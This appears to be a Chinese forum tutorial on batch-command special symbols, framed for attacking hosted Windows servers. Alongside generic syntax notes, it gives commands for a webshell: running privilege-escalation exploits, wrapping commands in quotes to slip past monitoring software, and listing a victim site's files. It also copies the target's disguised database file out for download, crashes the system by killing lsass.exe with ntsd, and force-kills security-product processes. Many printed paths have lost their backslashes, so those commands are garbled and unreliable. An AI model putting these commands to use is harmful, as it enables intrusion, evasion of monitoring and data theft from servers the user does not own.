dos中特殊符號命令的應用

0×01緣由0x02dos中雙引號含義0×03雙引號的用法0x04DOS中其他特殊符號0×05附錄0×01緣由昨天看見一貼記一次無聊的過程有幾個機油回帖詢問文件幻數檢測和雙引號包含的問題，晴天大牛未予以解釋。這裡就簡單介紹下～～0x02dos中雙引號含義DOS中雙引號」"是字元串界定符，這在批處理中常用到。但是dos中屬於特殊命令字元。雙引號允許在字元串中包含空格，進入一個特殊目錄可以用如下方法cd 「program files」 cd progra~1 cd pro* 以上三種方法都可以進入program files這個目錄下面是其他的用法：在表示帶有空格的路徑時常要用」"符號；來將路徑括起來,在一些命令裡面也需要」 「符號；在for/f中將表示它們包含的內容當作字元串分析；在for/f 「usebackq」表示它們包含的內容當作文件路徑並分析其文件的內容；在其它情況下表示其中的內容是一個完整的字元串，其中的>、>>、<>0×03雙引號的用法可以這樣執行cmd命令但是執行提權exp時依然會訪問拒絕。一是、直接上傳自動提權加帳號的exp（免參數exp），設置終端路徑為exp路徑。在執行命令那兒隨意敲個字母，執行。就可以順利執行exp。二是、利用雙引號包含突破監控軟體「」"c:php mpp.txt」 「ver」"」 下面介紹同學們常常遇到空格路徑無法執行的情況。現在知道雙引號包含就很簡單，直接「」"C:Documents and SettingsAll UsersApplication DataMicrosoftp.txt」 「ver」"」 當然我常用的突破方法（為了是執行多個exp的方便）是：執行exp時（C:Documents and SettingsAll UsersApplication DataMicrosoft）會出現這樣的情況：『C:Documents』 不是內部或外部命令，也不是可運行的程序或批處理文件。 解決辦法是利用菜刀的交互shell切換到exp路徑，如：Cd C:Documents and SettingsAll UsersApplication DataMicrosoft 當然如果無法跳轉的話，利用雙引號包含。Cd 「C:Documents and SettingsAll UsersApplication DataMicrosoft」 然後再執行exp或者cmd，就不會存在上面的情況了，aspshell一般是無法跳轉目錄的～～看圖：

這個在【科普】windows虛擬主機提權手冊中有所介紹。0x04DOS中其他特殊符號這些特殊符號想必機油們或多或少都遇到過，滲透中會起到強大的作用。DOS中其他特殊符號（批處理常用）：@\隱藏命令的回顯。~\在for中表示使用增強的變數擴展；在set中表示使用擴展環境變數指定位置的字元串；在set/a中表示按位取反。%\使用兩個%包含一個字元串表示引用環境變數。比如一個%time%可以擴展到當前的系統時間;單個%緊跟0-9的一個數字表示引用命令行參數；用於for中表示引用循環變數；連續的兩個%表示執行時脫為一個%。^\取消轉義字元，即將所有轉義字元的轉義作用關閉。比如要在屏幕顯示一些特殊的字元,比如> >> | ^等時,就可以在其前面加一個^符號來顯示這個^後面的字元了,^^就是顯示一個^,^|就是顯示一個|字元了;在set/a中是按位異；在findstr/r的[]中表示不匹配指定的字符集。&\命令連接字元。比如我要在一行文本上同時執行兩個命令,就可以用&命令連接這兩個命令；在set/a中是按位與。*\代表任意個任意字元,就是我們通常所說的」通配符」;比如想在c盤的根目錄查找c盤根目錄里所有的文本文件(.txt),那麼就可以輸入命令」dir c:*.txt」；在set/a中是乘法。比如」set/a x=4*2″,得到的結果是8；在findstr/r中表示將前一個字元多次匹配。()\命令包含或者是具有優先權的界定符吧,比如for命令要用到這個(),我們還可以在if,echo等命令中見到它的身影；-\範圍表示符,比如日期的查找,for命令里的tokens操作中就可以用到這個字元；在findstr/r中連接兩個字元表示匹配範圍；-跟在某些命令的/後表示取反向的開關。+\主要是在copy命令裡面會用到它,表示將很多個文件合併為一個文件,就要用到這個+字元了；在set/a中是加法。|\管道符。就是將上一個命令的輸出,作為下一個命令的輸入.」dir /a/b | more」就可以逐屏的顯示dir命令所輸出的信息;在set/a中是按位或；在幫助文檔中表示其前後兩個開關、選項或參數是二選一的。:\標籤定位符,可以接受goto命令所指向的標籤。比如在批處理文件裡面定義了一個」:begin」標籤,用」goto begin」命令就可以轉到」:begin」變遷後面來執行批處理命令了。/\表示其後的字元（串）是命令的功能開關（選項）。比如」dir /s/b/a-d」表示」dir」命令指定的不同的參數；在set/a中表示除法。>\命令重定向符,將其前面的命令的輸出結果重新定向到其後面的設備中去，後面的設備中的內容被覆蓋。比如可以用」dir > lxmxn.txt」將」dir」命令的結果輸出到」lxmxn.txt」這個文本文件中去；在findstr/r中表示匹配單詞的右邊界，需要配合轉義字元使用。>>\命令重定向符。將其前面的命令的輸出結果重新定向到其後面的設備中去，後面設備中的內容沒有被覆蓋。\將其後面的文件的內容作為其前面命令的輸入。在findstr/r中表示匹配單詞的左邊界，需要配合轉義字元使用。=\賦值符號,用於變數的賦值。比如」set a=windows」的意思意思是將」windows」這個字元串賦給變數」a」；在set/a中表示算術運算,比如」set /a x=5-6*5″。\這個」」符號在有的情況下,代表的是當前路徑的根目錄.比如當前目錄在c:windowssystem32下,那麼你」dir 」的話,就相當與」dir c:」在findstr/r中表示正則轉義字元。」在for/f中表示將它們包含的內容當作命令行執行並分析其輸出；在for/f 「usebackq」中表示將它們包含的字元串當作字元串分析。.\在路徑的後緊跟或者單獨出現時：一個.表示當前目錄；兩個.表示上一級目錄；在路徑中的文件名中出現時：最後的一個.表示主文件名與擴展文件名的分隔。&&\連接兩個命令,當&&前的命令成功時,才執行&&後的命令；||\連接兩個命令,當||前的命令失敗時,才執行||後的命令。$\在findstr命令裡面表示一行的結束。「在for/f中表示它們所包含的內容當作命令行執行並分析它的輸出。[]在幫助文檔表示其中的開關、選項或參數是可選的；在findstr/r中表示按其中指定的字符集匹配。\在findstr/r中表示在此位置匹配一個任意字元；在路徑中表示在此位置通配任意一個字元；緊跟在/後表示獲取命令的幫助文檔。!\當啟用變數延遲時,使用!!將變數名擴起來表示對變數值的引用；在set /a中表示邏輯非。比如set /a a=!0,這時a就表示邏輯1。0×05附錄其實除了這些特殊符號，還有很多命令都值得掌握，比如for命令。很多人都認為for命令只能在低許可權下查看文件目錄下的文件夾。for /d %i in (d:wwwweb*) do @echo %i 其實它還有很多用法。如果運用起來效果極佳。for /r d:wwwrootweb %i in (*.asp) do @echo %i >>c:windows emp1.txt ——這個是把 d:wwwrootweb目錄所有asp文件 列出來 ，然後保存在c:windows emp下的1.txt for /d %i in (d:wwwrootweb*) do @echo %i ——這句是顯示d:wwwrootweb 下所有文件，包括文件夾。 for /r d:wwwrootweb %i in (*.*) do @echo %i >>d:wwwrootweb11.txt ——*.* DOS下是所有的意思 也就是說顯示d:wwwrootweb1所有文件，然後保存在d:wwwrootweb11.txt *.*為任意後綴名，如果改成(*.exe)會把目錄與下面的子目錄的全部EXE文件列出 for /f %c in (d:wwwrootwebcoon.asp) do @echo %c ——查看coon.ASP文件內容 for /d %i in (???) do @echo %i ——把當前路徑下文件夾的名字只有1-3個字母的打出來 type F:VIPqq1369database#Collection.resx echo >>c:windows emp1.mdb ——通過for或者type讀取對方的資料庫配置文件，但資料庫修改了後綴名，例如為.resx 使我們不能下載，這時用type命令把資料庫複製到c:windows emp下面，然後下載！ /c for /r F:VIPqq1369 %i in (*) do @echo %i 列出所有F:VIPqq1369文件 甚至在系統許可權下：For /F 「tokens=2,3*」 %i in (『tasklist /nh ^| find 「lsass.exe」『) do ntsd -c q -p %iFor /F 「tokens=2,3*」 %i in (『tasklist /nh ^| find 「lsass.exe」『) do ntsd -c q -p %i 普通級彆強殺「lsass.exe」進程。 For /f 「tokens=1,2″ %%i in (『tasklist』) do (echo %%i | findstr /i 「stormliv.exe」 1>nul 2>nul && (ntsd -c q -p %%j & set qq=%%i)) 驅動級強行殺死所有名為「stormliv.exe」的進程（可以幹掉網維等產品）。
推薦閱讀：